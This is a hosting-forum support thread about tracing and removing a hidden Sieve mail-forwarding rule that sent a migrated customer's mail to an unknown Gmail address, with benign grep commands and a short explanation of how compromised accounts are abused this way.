Solved Incoming mails automatically forwarded to gmail

[Active8]

I have an customer which all his received mail automatically gets forwarded to an unknown Gmail address
There is no forwarder setup in DA and all the password are reset but the forwarding still happens

1. Sender in screenshot is an mail that is received but immediately forwarded to that gmail account in screenshot
2. is only this customer who has problem
3. no any forwarder is setup

any idea ?

 

[sparek]

Just to make sure, what is in:

/etc/virtual/%domain%/aliases

or

grep [email protected] /etc/virtual/%domain%/aliases

or in the filter file

/etc/virtual/%domain%/filter

or

grep [email protected] /etc/virtual/%domain%/filter

or just:

grep -lr [email protected] /etc

and for good measure, is this email address any where in the account's home directory? Although I don't think DirectAdmin has anything mail related in here.

grep -lr [email protected] /home/$(grep "^%domain%: " /etc/virtual/domainowners | cut -d ":" -f 2 | sed s/[[:space:]]*//g)

 

[Active8]

@sparek thanks you for the reply on this late night
Unfortunately none of those command or grep did return any value, I had already looked at those directory and files but no luck.

BUT, the last command found forwards here :
/home/user/imap/user.nl/info/.dovecot.svbin
/home/user/imap/user.nl/info/sieve/managesieve.sieve
/home/user/imap/user.nl/info/.dovecot.lda-dupes

I have delete the reference inside those files and that did the trick
This is an Cpanel customer which we migrated but never saw this at that time

Reason we saw it now was because i was running trough the logs and found many forward that took my attention

Thank you very much and have an nice weekend !

 

[sparek]

I wasn't sure if DirectAdmin had email-user level filters or not. I guess they do.

Yea, this used to be a ... minor-moderate? problem a few years ago. Accounts would get compromised and the nefarious compromiser would set a filter to forward mail for email accounts to another email address. The owner of the compromised account would be none the wiser, except now all of their incoming email was being sent to another email address.

Of course the root cause of the compromise - the account owner's password being compromised - was still the issue. How was the password compromised? Nobody knows. Account owner probably either had a weak password or ... more likely... had/has a keylogger or malware trojan running on their computer that's either reading their browser's password locker or capturing keystrokes. Not really anything a web hosting company can do to defend against that.